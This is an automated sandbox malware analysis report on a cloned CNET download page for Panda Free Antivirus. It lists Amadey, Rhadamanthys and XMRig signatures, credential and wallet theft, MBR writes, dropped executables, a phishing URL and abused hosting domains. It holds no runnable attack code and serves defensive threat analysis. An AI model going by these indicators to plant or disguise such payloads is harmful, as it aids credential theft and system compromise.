Malware Analysis Report

2024-11-30 02:15

Sample ID 240326-n9lz1scf8y
Target Panda Free Antivirus - Free download and software reviews - CNET Download.html
SHA256 fa05724ca2250316e8ea410d385a3a9f149e7f3678cac1016343174d16827d43
Tags
amadey rhadamanthys xmrig bootkit discovery evasion miner motw persistence phishing spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fa05724ca2250316e8ea410d385a3a9f149e7f3678cac1016343174d16827d43

Threat Level: Known bad

The file Panda Free Antivirus - Free download and software reviews - CNET Download.html was found to be: Known bad.

Malicious Activity Summary

amadey rhadamanthys xmrig bootkit discovery evasion miner motw persistence phishing spyware stealer trojan upx

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Rhadamanthys

XMRig Miner payload

Stops running service(s)

Blocklisted process makes network request

Creates new service(s)

Downloads MZ/PE file

Reads WinSCP keys stored on the system

Checks computer location settings

UPX packed file

Loads dropped DLL

Reads local data of messenger clients

Reads user/profile data of web browsers

Executes dropped EXE

Writes to the Master Boot Record (MBR)

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Mark of the Web detected: This indicates that the page was originally saved or cloned.

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Checks processor information in registry

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 12:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 12:05

Reported

2024-03-26 12:26

Platform

win10v2004-20240226-en

Max time kernel

1241s

Max time network

1232s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2236 created 2384 N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 C:\Windows\system32\sihost.exe
PID 2284 created 3496 N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif C:\Windows\Explorer.EXE

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\Launhcer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\3plugin0324 N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\winrar.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\winrar.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\winrar.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0324 N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-700.exe N/A
N/A N/A C:\Users\Admin\Downloads\winrar-x64-700.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe N/A
N/A N/A C:\Users\Admin\Downloads\ClassicShell.exe N/A
N/A N/A C:\Users\Admin\Downloads\IconDance.exe N/A
N/A N/A C:\Users\Admin\Downloads\DesktopPuzzle.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Mark of the Web detected: This indicates that the page was originally saved or cloned.

phishing motw
Description Indicator Process Target
N/A https://olegariohombre.com/ N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Downloads\ClassicShell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4128 set thread context of 5132 N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe C:\Windows\system32\conhost.exe
PID 4128 set thread context of 4104 N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe C:\Windows\system32\dwm.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Roaming\services\3plugin0324 N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\plugin3944
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\3plugin0324
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0 = 4d736f3a3a436865636b73756d52656769737472793a3a446174617c75696e7436345f747c343639373735323330333638363338333139333b456373436f6e666967526573706f6e7365446174617c7b202256657222203a2022696e7433325f747c30222c2022436f6e6649647322203a20227374643a3a77737472696e677c502d522d313039383135382d312d352c502d522d37363735372d312d322c502d522d35343930332d312d332c502d522d32363134362d372d31372c502d442d32393633352d312d312c502d442d32373038372d312d392c502d522d37393638382d312d332c502d522d35333533322d312d352c502d522d35313433362d312d362c502d522d35313432372d31382d31322c502d522d34303436342d31382d392c502d582d39383531382d362d392c502d522d33383339302d31382d32312c626c6f636b6564677261706869637361646170746572353a3437353839392c502d522d33353039392d322d342c502d522d36313430382d31382d332c502d522d35353734362d322d352c502d522d35333531322d312d342c502d522d34363937342d31382d31382c502d522d33383935332d312d31312c502d522d33363535312d31382d31382c502d522d37313431342d312d362c502d522d34303235332d362d31392c502d522d34303235342d362d31382c502d522d33353430312d362d372c502d522d33323130372d32322d32322c502d522d33393134362d31342d31352c502d522d33393134372d31342d32302c502d522d32383534362d362d31312c502d522d32383136352d362d32382c502d522d32343938302d382d34382c502d522d32343339302d352d31322c502d522d31383237392d322d36352c502d442d33343230302d342d352c502d522d35313134352d322d372c502d522d32393932382d322d32302c502d522d36373933322d312d342c502d522d36373230312d312d342c502d522d36343534352d312d342c502d522d36343033352d312d342c502d522d35333531352d31382d392c502d522d35333238302d312d362c502d522d35323234372d312d352c502d522d35313935382d312d352c502d522d35313834322d312d352c502d522d35313237372d322d362c502d522d34373435312d31382d32302c502d522d34353931392d31382d31392c502d522d34353038352d31382d31322c502d522d34313434322d31382d31382c502d522d33383038352d31322d392c502d522d31383734342d362d32322c502d442d33343233392d312d362c502d522d313033343136392d31302d372c502d452d32383637372d322d332c502d522d35353132322d382d382c502d522d35303235352d31302d392c502d522d34343930372d312d392c502d522d34353331342d31302d31362c502d522d34343936352d43312d362c502d452d33383233312d43312d342c502d522d39343536302d31342d31322c502d522d39343138392d31342d31332c502d522d39333838322d31342d32362c502d522d35343732382d31362d32332c502d522d35343639382d31362d31362c502d522d35343635382d31382d31392c502d522d33383330362d31382d332c502d522d33353731372d352d33302c502d522d33343031392d342d332c502d582d35333834352d312d392c502d582d35333737322d312d332c502d582d35313739302d312d332c502d452d34323730302d322d342c502d522d313032353233322d32342d392c502d522d37313335382d312d342c502d522d37303934312d312d342c502d522d36393036352d312d332c502d522d36373136302d312d372c502d522d35393738312d312d342c502d522d35353633312d312d342c502d522d35343231352d312d342c502d522d35333735312d312d342c502d522d35333735322d312d342c502d522d35333532362d312d342c502d522d35323131302d312d342c502d522d34393736352d31352d33322c502d522d34383831382d31372d32352c502d522d35303637392d312d342c502d522d35303438362d31382d31322c502d522d34343833302d31382d31332c502d522d34393431362d342d31342c502d522d34383435372d322d362c502d522d34373937342d31362d31382c502d522d34363534342d31382d31312c502d522d34353630392d31342d362c502d522d34353139372d322d362c502d522d34343034362d31382d31312c502d522d34343031352d31382d32302c502d522d34333732332d322d362c502d522d34313734322d31382d33322c502d522d34303938302d31382d31362c502d522d34303335392d322d31302c502d522d33393032392d352d31382c502d522d33383833352d31382d34382c502d522d33373637362d31382d34362c502d522d33363331302d342d352c502d522d33353934352d31302d352c502d522d33353134332d342d342c502d522d33333535332d342d362c502d522d33333533362d31322d31332c502d522d32393830392d312d372c502d522d32363936382d332d392c66697365723139303a3337373730342c686170707930333137323032302d313a36313937372c686170707930323036323032302d303a32383432382c502d522d35333534352d342d352c502d522d35303731312d31382d31312c502d522d34393733362d362d32322c502d522d34383436372d31382d31382c502d522d33323130362d372d33332c502d522d33303038352d312d392c502d522d32393133382d33382d38332c502d522d32393331352d33362d36392c502d522d32353030392d312d382c502d522d32343336332d312d31332c502d522d32313633312d31302d36342c502d522d31393839382d312d32322c502d522d31393831342d312d36322c502d522d31393031322d312d35372c502d582d313031353535342d312d352c502d582d35303232302d312d332c502d582d34393733302d312d332c502d522d36393334372d312d352c502d522d36343537342d312d342c502d522d35343131362d312d342c502d522d35333538352d31382d31382c502d522d35323539342d31382d352c502d522d35323338362d312d342c502d522d35303938302d322d342c502d522d35303933382d312d342c502d522d35303135322d31382d32302c502d522d34393137352d31382d32322c502d522d34373236302d31382d32332c502d522d34343135362d31382d32362c502d522d34333238342d31382d31392c